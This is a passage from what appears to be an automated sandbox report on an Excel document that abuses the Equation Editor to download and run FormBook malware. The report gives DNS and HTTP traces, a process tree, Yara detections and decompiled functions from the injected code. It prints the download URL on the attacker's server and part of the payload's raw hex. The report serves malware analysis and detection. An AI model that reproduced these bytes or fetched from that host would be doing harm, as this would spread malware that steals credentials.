Oct 13, 2021 17:07:18.845947981 CEST	192.168.2.22	8.8.8.8	0xe966	Standard query (0)	hqpyda.bl.files.1drv.com	A (IP address)	IN (0x0001)
Oct 13, 2021 17:07:19.136692047 CEST	192.168.2.22	8.8.8.8	0xae43	Standard query (0)	hqpyda.bl.files.1drv.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Type	Class
Oct 13, 2021 17:06:38.604048014 CEST	8.8.8.8	192.168.2.22	0x9487	No error (0)	onedrive.live.com	odc-web-geo.onedrive.akadns.net	CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 17:06:40.188663960 CEST	8.8.8.8	192.168.2.22	0x4a4c	No error (0)	hqpyda.bl.files.1drv.com	bl-files.fe.1drv.com	CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 17:06:40.188663960 CEST	8.8.8.8	192.168.2.22	0x4a4c	No error (0)	bl-files.fe.1drv.com	odc-bl-files-geo.onedrive.akadns.net	CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 17:07:18.312407017 CEST	8.8.8.8	192.168.2.22	0x1a95	No error (0)	onedrive.live.com	odc-web-geo.onedrive.akadns.net	CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 17:07:18.790204048 CEST	8.8.8.8	192.168.2.22	0x391f	No error (0)	onedrive.live.com	odc-web-geo.onedrive.akadns.net	CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 17:07:18.864113092 CEST	8.8.8.8	192.168.2.22	0xe966	No error (0)	hqpyda.bl.files.1drv.com	bl-files.fe.1drv.com	CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 17:07:18.864113092 CEST	8.8.8.8	192.168.2.22	0xe966	No error (0)	bl-files.fe.1drv.com	odc-bl-files-geo.onedrive.akadns.net	CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 17:07:19.200906038 CEST	8.8.8.8	192.168.2.22	0xae43	No error (0)	hqpyda.bl.files.1drv.com	bl-files.fe.1drv.com	CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 17:07:19.200906038 CEST	8.8.8.8	192.168.2.22	0xae43	No error (0)	bl-files.fe.1drv.com	odc-bl-files-geo.onedrive.akadns.net	CNAME (Canonical name)	IN (0x0001)

HTTP Request Dependency Graph

192.3.222.155

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	192.3.222.155	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 17:05:25.235505104 CEST	0	OUT	GET /008008/vbc.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 192.3.222.155 Connection: Keep-Alive
Oct 13, 2021 17:05:25.411304951 CEST	1	IN	HTTP/1.1 200 OK Date: Wed, 13 Oct 2021 15:05:26 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24 Last-Modified: Wed, 13 Oct 2021 09:47:27 GMT ETag: "f7c00-5ce38d98ee1b4" Accept-Ranges: bytes Content-Length: 1014784 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 f0 09 00 00 88 05 00 00 00 00 00 2c ff 09 00 00 10 00 00 00 00 0a 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 d0 0f 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 0b 00 60 27 00 00 00 e0 0c 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0c 00 bc bf 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 0c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 8c ef 09 00 00 10 00 00 00 f0 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 64 b2 01 00 00 00 0a 00 00 b4 01 00 00 f4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 e1 0d 00 00 00 c0 0b 00 00 00 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 60 27 00 00 00 d0 0b 00 00 28 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 40 00 00 00 00 00 0c 00 00 00 00 00 00 d0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 10 0c 00 00 02 00 00 00 d0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 bc bf 00 00 00 20 0c 00 00 c0 00 00 00 d2 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 ea 02 00 00 e0 0c 00 00 ea 02 00 00 92 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 0f 00 00 00 00 00 00 7c 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*,@@`' CODE `DATAd@BSS.idata`'(@.tls@.rdata@P.reloc @P.rsrc@P\|@P
Oct 13, 2021 17:05:25.411339045 CEST	3	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 40 00 03 07 42 6f 6f 6c 65 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 05 46 61 6c 73 65 04 54 72 75 65 8d 40 00 2c 10 40 00 02 04 43 68 61 72 01 00 00 00 00 ff 00 00 00 90 40 10 40 00 01 Data Ascii: @Boolean@FalseTrue@,@Char@@SmallintX@Integerp@Byte@Word@Cardinal@Int64@Double@@Curr
Oct 13, 2021 17:05:25.411360979 CEST	4	IN	Data Raw: 04 89 0a 8b 54 24 04 8b 0c 24 89 4a 04 8b 15 e8 c5 4b 00 89 10 a3 e8 c5 4b 00 59 5a c3 8b c0 53 56 57 55 83 c4 f8 8b d9 8b f0 8b fc 8b 06 89 07 8b 02 89 03 8b 42 04 89 43 04 8b 07 8b 00 89 44 24 04 8b 17 8b 52 08 8b ca 8b 2f 03 4d 0c 8b 03 3b c8 Data Ascii: T$$JKKYZSVWUBCD$R/M;u@@CC;uq@CD$;7uu3YZ]_^[@SVWU$D$@;>_z;rv;u!BAB)Bxu
Oct 13, 2021 17:05:25.411381960 CEST	5	IN	Data Raw: 89 0c 24 8b fa 8b d8 8d 74 24 04 bd fc c5 4b 00 81 c7 ff 3f 00 00 81 e7 00 c0 ff ff 8b 45 00 89 06 eb 06 8b 06 8b 00 89 06 3b 2e 74 07 8b 06 3b 58 08 75 ef 8b 06 3b 58 08 75 5f 8b 06 3b 78 0c 0f 8e 9c 00 00 00 8b 06 8b d7 2b 50 0c 8b 06 8b 40 08 Data Ascii: $t$K?E;.t;Xu;Xu_;x+P@AL$5\|$t3L$T$o\|$uL$T$D$$3L$\|$t4L$T$(\|$TL$T$D$4$3Rh;uB;x;
Oct 13, 2021 17:05:25.584945917 CEST	7	IN	Data Raw: 11 f7 c2 fe ff ff ff 74 0a c7 05 c8 c5 4b 00 05 00 00 00 f6 01 01 74 29 8b d0 83 ea 0c 8b 72 08 2b c6 89 04 24 8b 04 24 3b 70 08 74 0a c7 05 c8 c5 4b 00 06 00 00 00 8b 04 24 e8 30 fe ff ff 03 de 8b c3 5a 5e 5b c3 53 56 51 8b d8 33 f6 8b 03 a9 00 Data Ascii: tKt)r+$$;ptK$0Z^[SVQ3t%u$$$@#Z^[@SVWU3hD$\|$D$xT$B.+++}D$+PE
Oct 13, 2021 17:05:25.584981918 CEST	8	IN	Data Raw: 4b 00 e8 36 ef ff ff 83 c3 07 83 e3 fc 83 fb 0c 7d 05 bb 0c 00 00 00 81 fb 00 10 00 00 0f 8f ac 00 00 00 8b c3 85 c0 79 03 83 c0 03 c1 f8 02 8b 15 24 c6 4b 00 8b 54 82 f4 89 55 f8 83 7d f8 00 0f 84 89 00 00 00 8b 55 f8 03 d3 89 55 ec 8b 55 ec 83 Data Ascii: K6}y$KTU}UUU"URUU;Uu$K3L&$KMLEEEUPEUEEE@UEEKK;KS)K=K}K3K
Oct 13, 2021 17:05:25.585006952 CEST	10	IN	Data Raw: 0c 5d 5f 5e 5b c3 90 55 8b ec 83 c4 f8 53 56 8b f2 8b d8 80 3d c4 c5 4b 00 00 75 13 e8 02 f2 ff ff 84 c0 75 0a 33 c0 89 45 fc e9 98 00 00 00 33 d2 55 68 d1 2a 40 00 64 ff 32 64 89 22 80 3d 4d c0 4b 00 00 74 0a 68 cc c5 4b 00 e8 b3 e9 ff ff 8b d6 Data Ascii: ]_^[USV=Kuu3E3Uh@d2d"=MKthKt]=E%;}}tUaEE3ZYYdh@=MKthKLE^[YY]@SQ~<J$<$u`
Oct 13, 2021 17:05:25.585028887 CEST	11	IN	Data Raw: 08 8b 1a 39 d9 75 45 4e 74 15 8b 48 04 8b 5a 04 39 d9 75 38 83 c0 08 83 c2 08 4e 75 e2 eb 06 83 c0 04 83 c2 04 5e 83 e6 03 74 36 8a 08 3a 0a 75 30 4e 74 13 8a 48 01 3a 4a 01 75 25 4e 74 08 8a 48 02 3a 4a 02 75 1a 31 c0 5e 5b c3 5e 38 d9 75 10 38 Data Ascii: 9uENtHZ9u8Nu^t6:u0NtH:Ju%NtH:Ju1^[^8u8u8u8^[Wfx_SVWR1)110Cu}-CGL$~)~O DGKu_^[3SV
Oct 13, 2021 17:05:25.585056067 CEST	12	IN	Data Raw: 89 45 f8 8d 45 fc 50 6a 01 6a 00 68 10 35 40 00 68 02 00 00 80 e8 d1 de ff ff 85 c0 75 4d 33 c0 55 68 e9 34 40 00 64 ff 30 64 89 20 c7 45 f4 04 00 00 00 8d 45 f4 50 8d 45 f8 50 6a 00 6a 00 68 2c 35 40 00 8b 45 fc 50 e8 a6 de ff ff 33 c0 5a 59 59 Data Ascii: EEPjjh5@huM3Uh4@d0d EEPEPjjh,5@EP3ZYYdh4@EPf Jf%fUf?ff J]SOFTWARE\Borland\Delphi\RTLFPUMaskValue- JQ$$ZVWp1A_^@S1t
Oct 13, 2021 17:05:25.585078001 CEST	14	IN	Data Raw: b2 81 50 ff 51 fc 58 e8 09 00 00 00 e8 44 04 00 00 c3 8d 40 00 8b 10 ff 52 f8 c3 8b c0 53 8b d8 8b c3 8b 10 ff 52 e4 8b c3 5b c3 8b c0 84 d2 7f 01 c3 50 52 8b 10 ff 52 e8 5a 58 c3 90 80 3d 28 00 4a 00 01 76 11 6a 00 6a 00 6a 00 68 df fa ed 0e ff Data Ascii: PQXD@RSR[PRRZX=(JvjjjhK=(JtPPRTjjhKX@TjjhKX@=(JvPs=(JvPS@tA9t9uAA=(JvPRQQTjj
Oct 13, 2021 17:05:25.585099936 CEST	15	IN	Data Raw: 74 2e 48 74 13 48 74 24 eb 3a 2d fd 00 00 c0 74 2f 83 e8 3d 74 26 eb 2c b0 c8 eb 2a b0 c9 eb 26 b0 cd eb 22 b0 cf eb 1e b0 c8 eb 1a b0 d7 eb 16 b0 ce eb 12 b0 d8 eb 0e b0 da eb 0a b0 d9 eb 06 b0 ca eb 02 b0 ff 25 ff 00 00 00 8b 52 0c e8 c0 ec ff Data Ascii: t.HtHt$:-t/=t&,*&"%R]D$@=(JwD$PTtqD$T$jPh?@RK\$;SCtKSKtL$Q$1

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2068 Parent PID: 596

General

Start time:	17:04:22
Start date:	13/10/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13fd70000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 1188 Parent PID: 596

General

Start time:	17:04:43
Start date:	13/10/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 2564 Parent PID: 1188

General

Start time:	17:04:47
Start date:	13/10/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	1014784 bytes
MD5 hash:	A65B1815177EF9EBA7E5E894BBF65A3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low

Chronological Activities

Analysis Process: DpiScaling.exe PID: 1464 Parent PID: 2564

General

Start time:	17:06:04
Start date:	13/10/2021
Path:	C:\Windows\SysWOW64\DpiScaling.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\DpiScaling.exe
Imagebase:	0x8b0000
File size:	76800 bytes
MD5 hash:	8C9DA2E414E713D3DAFF1F18223AE11B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.633264807.0000000072480000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.633264807.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
Reputation:	moderate

Chronological Activities

Analysis Process: explorer.exe PID: 1764 Parent PID: 1464

General

Start time:	17:06:06
Start date:	13/10/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0xffa10000
File size:	3229696 bytes
MD5 hash:	38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: Zxsdvph.exe PID: 2680 Parent PID: 1764

General

Start time:	17:06:16
Start date:	13/10/2021
Path:	C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe'
Imagebase:	0x400000
File size:	1014784 bytes
MD5 hash:	A65B1815177EF9EBA7E5E894BBF65A3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: DpiScaling.exe PID: 1464 Parent PID: 2564 DpiScaling.exeCOMMON

Executed Functions

Function 72498690, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E72498690(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E724991E0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x72493a31
				_t6 =  &_a32; // 0x72493d72
				_t12 =  &_a8; // 0x72493d72
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}

0x72498693
0x7249869f
0x724986a7
0x724986ac
0x724986b2
0x724986cd
0x724986d5
0x724986d9

APIs

NtReadFile.NTDLL(r=Ir,5E972F65,FFFFFFFF,?,?,?,r=Ir,?,1:Ir,FFFFFFFF,5E972F65,72493D72,?,00000000), ref: 724986D5

Strings

r=Ir, xrefs: 724986B2, 724986C0
1:Ir, xrefs: 724986AC, 724986B8
r=Ir, xrefs: 724986CD, 724986D4

Memory Dump Source

Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: 1:Ir$r=Ir$r=Ir
API String ID: 2738559852-2263273510
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 1c9a813797a110df30d896115a6898fce3f7ef3a7775591708ad8987fb8e30e9
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 76F0A4B2200208ABDB14DF89DC85EEB77ADAF8C754F158248BA1D97251DA30E911CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 724985E0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E724985E0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E724991E0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x724985ef
0x724985f7
0x7249862d
0x72498631

APIs

NtCreateFile.NTDLL(00000060,72488B13,?,72493BB7,72488B13,FFFFFFFF,?,?,FFFFFFFF,72488B13,72493BB7,?,72488B13,00000060,00000000,00000000), ref: 7249862D

Memory Dump Source

Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 72989906d6faa31a56477962e88ce9834f1f47e7ada4a27c13a9cd90a45812bb
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: A5F0B2B2204208ABCB08CF88DC85EEB77ADAF8C754F158248FA0D97240C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 724987C0, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E724987C0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				asm("in al, dx");
				_t10 = _a4;
				_t3 = _t10 + 0xc60; // 0xca0
				E724991E0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x724987c2
0x724987c3
0x724987cf
0x724987d7
0x724987f9
0x724987fd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,724993B4,?,00000000,?,00003000,00000040,00000000,00000000,72488B13), ref: 724987F9

Memory Dump Source

Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 544dd1ab3a78790940a0a6c9a03bd68e07458f6b4f113b0d90ccf5f0e00385cd
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 56F015B2200208ABDB14DF89CC85EAB77ADAF88750F118148FE0897241C630F910CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 724987C2, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E724987C2() {
				long _t14;
				void* _t21;
				void* _t25;

				asm("in al, dx");
				_t10 =  *((intOrPtr*)(_t25 + 8));
				_t3 = _t10 + 0xc60; // 0xca0
				E724991E0(_t21,  *((intOrPtr*)(_t25 + 8)), _t3,  *((intOrPtr*)( *((intOrPtr*)(_t25 + 8)) + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory( *(_t25 + 0xc),  *(_t25 + 0x10),  *(_t25 + 0x14),  *(_t25 + 0x18),  *(_t25 + 0x1c),  *(_t25 + 0x20)); // executed
				return _t14;
			}

0x724987c2
0x724987c3
0x724987cf
0x724987d7
0x724987f9
0x724987fd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,724993B4,?,00000000,?,00003000,00000040,00000000,00000000,72488B13), ref: 724987F9

Memory Dump Source

Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: d141e42af92490f050884ded5524d08a377f3f87b9f48313ece682e970784e27
Instruction ID: de9aab209645c58df40ae533314d8889c53137f4f8f587e6c8922d422a268de1
Opcode Fuzzy Hash: d141e42af92490f050884ded5524d08a377f3f87b9f48313ece682e970784e27
Instruction Fuzzy Hash: 46F015B2200108AFDB14CF88CC84EEB7BADAF88350F118248FA0897240C630E911CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 72498710, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E72498710(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x72489763
				E724991E0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x72498713
0x72498716
0x7249871f
0x72498727
0x72498735
0x72498739

APIs

NtClose.NTDLL(72493D50,?,?,72493D50,72488B13,FFFFFFFF), ref: 72498735

Memory Dump Source

Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: b96f8f29bc04b463bdbaf386d3e16e847137ea189777c4b74b2d977d26ef12e6
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 1AD012752002146BD710DBD8CC49E977B5CEF44750F154459BA585B241C530F600C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 02590048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02590053

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A

Uniqueness

Uniqueness Score: -1.00%

Function 025900C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 025900CF

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
